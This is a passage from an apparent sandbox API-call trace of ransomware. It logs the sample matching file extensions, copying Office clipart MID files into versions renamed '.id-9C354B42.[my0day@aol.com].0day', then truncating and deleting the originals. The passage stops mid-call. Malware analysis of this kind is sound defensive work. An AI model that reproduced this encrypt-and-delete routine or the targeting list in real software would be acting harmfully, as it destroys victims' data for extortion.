4 [0271.724] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.724] lstrlenW (lpString=".rar") returned 4 [0271.724] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.724] lstrlenW (lpString=".bz2") returned 4 [0271.724] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.724] lstrlenW (lpString=".7z") returned 3 [0271.724] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0271.724] lstrlenW (lpString=".dbf") returned 4 [0271.724] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0271.724] lstrlenW (lpString=".1cd") returned 4 [0271.724] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0271.724] lstrlenW (lpString=".jpg") returned 4 [0271.725] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.725] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0271.725] lstrlenW (lpString="SPACE_01.MID") returned 12 [0271.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\space_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0271.725] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=4219) returned 1 [0271.725] CloseHandle (hObject=0x398) returned 1 [0271.725] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\space_01.mid")) returned 0x20 [0271.725] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\space_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\space_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0271.726] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.726] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.726] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\space_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0271.726] GetLastError () returned 0x0 [0271.726] ReadFile (in: hFile=0x398, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x107b, lpOverlapped=0x0) returned 1 [0271.809] WriteFile (in: hFile=0x354, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0x1080, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0x1080, lpOverlapped=0x0) returned 1 [0271.811] ReadFile (in: hFile=0x398, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.811] WriteFile (in: hFile=0x354, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.811] SetEndOfFile (hFile=0x354) returned 1 [0271.828] CloseHandle (hObject=0x354) returned 1 [0271.864] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.864] SetEndOfFile (hFile=0x398) returned 1 [0271.933] CloseHandle (hObject=0x398) returned 1 [0271.933] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.952] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\space_01.mid")) returned 1 [0271.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63 [0271.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63 [0271.952] lstrlenW (lpString=".doc") returned 4 [0271.952] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.952] lstrlenW (lpString=".docx") returned 5 [0271.952] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0271.952] lstrlenW (lpString=".pdf") returned 4 [0271.952] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.952] lstrlenW (lpString=".xls") returned 4 [0271.952] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.953] lstrlenW (lpString=".xlsx") returned 5 [0271.953] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0271.953] lstrlenW (lpString=".ppt") returned 4 [0271.953] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63 [0271.953] lstrlenW (lpString=".zip") returned 4 [0271.953] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.953] lstrlenW (lpString=".rar") returned 4 [0271.953] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.953] lstrlenW (lpString=".bz2") returned 4 [0271.953] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.953] lstrlenW (lpString=".7z") returned 3 [0271.953] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63 [0271.953] lstrlenW (lpString=".dbf") returned 4 [0271.953] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63 [0271.953] lstrlenW (lpString=".1cd") returned 4 [0271.953] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63 [0271.953] lstrlenW (lpString=".jpg") returned 4 [0271.953] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63 [0271.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63 [0271.953] lstrlenW (lpString=".doc") returned 4 [0271.953] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.953] lstrlenW (lpString=".docx") returned 5 [0271.953] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0271.953] lstrlenW (lpString=".pdf") returned 4 [0271.953] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.953] lstrlenW (lpString=".xls") returned 4 [0271.953] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.953] lstrlenW (lpString=".xlsx") returned 5 [0271.953] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0271.954] lstrlenW (lpString=".ppt") returned 4 [0271.954] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63 [0271.954] lstrlenW (lpString=".zip") returned 4 [0271.954] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.954] lstrlenW (lpString=".rar") returned 4 [0271.954] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.954] lstrlenW (lpString=".bz2") returned 4 [0271.954] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.954] lstrlenW (lpString=".7z") returned 3 [0271.954] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63 [0271.954] lstrlenW (lpString=".dbf") returned 4 [0271.954] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63 [0271.954] lstrlenW (lpString=".1cd") returned 4 [0271.954] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.954] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63 [0271.954] lstrlenW (lpString=".jpg") returned 4 [0271.954] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.954] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0271.954] lstrlenW (lpString="SUMER_01.MID") returned 12 [0271.954] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.955] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=14044) returned 1 [0271.956] CloseHandle (hObject=0x384) returned 1 [0271.956] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid")) returned 0x20 [0271.956] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.956] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.956] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.956] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.956] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0271.957] GetLastError () returned 0x0 [0271.957] ReadFile (in: hFile=0x384, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x36dc, lpOverlapped=0x0) returned 1 [0271.987] WriteFile (in: hFile=0x38c, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0x36e0, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0x36e0, lpOverlapped=0x0) returned 1 [0271.988] ReadFile (in: hFile=0x384, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.988] WriteFile (in: hFile=0x38c, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.988] SetEndOfFile (hFile=0x38c) returned 1 [0271.989] CloseHandle (hObject=0x38c) returned 1 [0271.989] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.989] SetEndOfFile (hFile=0x384) returned 1 [0271.991] CloseHandle (hObject=0x384) returned 1 [0271.991] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.991] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid")) returned 1 [0271.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0271.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0271.992] lstrlenW (lpString=".doc") returned 4 [0271.992] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.992] lstrlenW (lpString=".docx") returned 5 [0271.992] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0271.992] lstrlenW (lpString=".pdf") returned 4 [0271.992] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.992] lstrlenW (lpString=".xls") returned 4 [0271.992] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.992] lstrlenW (lpString=".xlsx") returned 5 [0271.992] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0271.992] lstrlenW (lpString=".ppt") returned 4 [0271.992] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0271.992] lstrlenW (lpString=".zip") returned 4 [0271.992] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.992] lstrlenW (lpString=".rar") returned 4 [0271.992] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.992] lstrlenW (lpString=".bz2") returned 4 [0271.992] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.992] lstrlenW (lpString=".7z") returned 3 [0271.992] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0271.992] lstrlenW (lpString=".dbf") returned 4 [0271.993] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0271.993] lstrlenW (lpString=".1cd") returned 4 [0271.993] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0271.993] lstrlenW (lpString=".jpg") returned 4 [0271.993] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0271.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0271.993] lstrlenW (lpString=".doc") returned 4 [0271.993] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.993] lstrlenW (lpString=".docx") returned 5 [0271.993] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0271.993] lstrlenW (lpString=".pdf") returned 4 [0271.993] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.993] lstrlenW (lpString=".xls") returned 4 [0271.993] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.993] lstrlenW (lpString=".xlsx") returned 5 [0271.993] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0271.993] lstrlenW (lpString=".ppt") returned 4 [0271.993] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0271.993] lstrlenW (lpString=".zip") returned 4 [0271.993] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.993] lstrlenW (lpString=".rar") returned 4 [0271.993] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.993] lstrlenW (lpString=".bz2") returned 4 [0271.993] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.993] lstrlenW (lpString=".7z") returned 3 [0271.994] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0271.994] lstrlenW (lpString=".dbf") returned 4 [0271.994] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0271.994] lstrlenW (lpString=".1cd") returned 4 [0271.994] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0271.994] lstrlenW (lpString=".jpg") returned 4 [0271.994] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.994] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0271.994] lstrlenW (lpString="WNTER_01.MID") returned 12 [0271.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wnter_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.012] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=6915) returned 1 [0272.012] CloseHandle (hObject=0x388) returned 1 [0272.012] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wnter_01.mid")) returned 0x20 [0272.022] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wnter_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.022] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wnter_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0272.023] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.023] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wnter_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0272.023] GetLastError () returned 0x0 [0272.023] ReadFile (in: hFile=0x394, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x1b03, lpOverlapped=0x0) returned 1 [0272.025] WriteFile (in: hFile=0x318, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0x1b10, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0x1b10, lpOverlapped=0x0) returned 1 [0272.027] ReadFile (in: hFile=0x394, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.027] WriteFile (in: hFile=0x318, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.027] SetEndOfFile (hFile=0x318) returned 1 [0272.027] CloseHandle (hObject=0x318) returned 1 [0272.027] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.027] SetEndOfFile (hFile=0x394) returned 1 [0272.030] CloseHandle (hObject=0x394) returned 1 [0272.030] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.031] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wnter_01.mid")) returned 1 [0272.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63 [0272.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63 [0272.031] lstrlenW (lpString=".doc") returned 4 [0272.031] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0272.031] lstrlenW (lpString=".docx") returned 5 [0272.031] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0272.031] lstrlenW (lpString=".pdf") returned 4 [0272.031] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0272.031] lstrlenW (lpString=".xls") returned 4 [0272.031] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0272.031] lstrlenW (lpString=".xlsx") returned 5 [0272.031] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0272.031] lstrlenW (lpString=".ppt") returned 4 [0272.031] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0272.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63 [0272.032] lstrlenW (lpString=".zip") returned 4 [0272.032] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0272.032] lstrlenW (lpString=".rar") returned 4 [0272.032] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0272.032] lstrlenW (lpString=".bz2") returned 4 [0272.032] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0272.032] lstrlenW (lpString=".7z") returned 3 [0272.032] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0272.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63 [0272.032] lstrlenW (lpString=".dbf") returned 4 [0272.032] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0272.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63 [0272.032] lstrlenW (lpString=".1cd") returned 4 [0272.032] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0272.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63 [0272.032] lstrlenW (lpString=".jpg") returned 4 [0272.032] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0272.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63 [0272.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63 [0272.032] lstrlenW (lpString=".doc") returned 4 [0272.032] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0272.032] lstrlenW (lpString=".docx") returned 5 [0272.032] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0272.032] lstrlenW (lpString=".pdf") returned 4 [0272.032] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0272.032] lstrlenW (lpString=".xls") returned 4 [0272.032] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0272.032] lstrlenW (lpString=".xlsx") returned 5 [0272.032] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0272.032] lstrlenW (lpString=".ppt") returned 4 [0272.032] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0272.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63 [0272.032] lstrlenW (lpString=".zip") returned 4 [0272.033] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0272.033] lstrlenW (lpString=".rar") returned 4 [0272.033] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0272.033] lstrlenW (lpString=".bz2") returned 4 [0272.033] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0272.033] lstrlenW (lpString=".7z") returned 3 [0272.033] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0272.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63 [0272.033] lstrlenW (lpString=".dbf") returned 4 [0272.033] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0272.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63 [0272.033] lstrlenW (lpString=".1cd") returned 4 [0272.033] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0272.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID") returned 63 [0272.033] lstrlenW 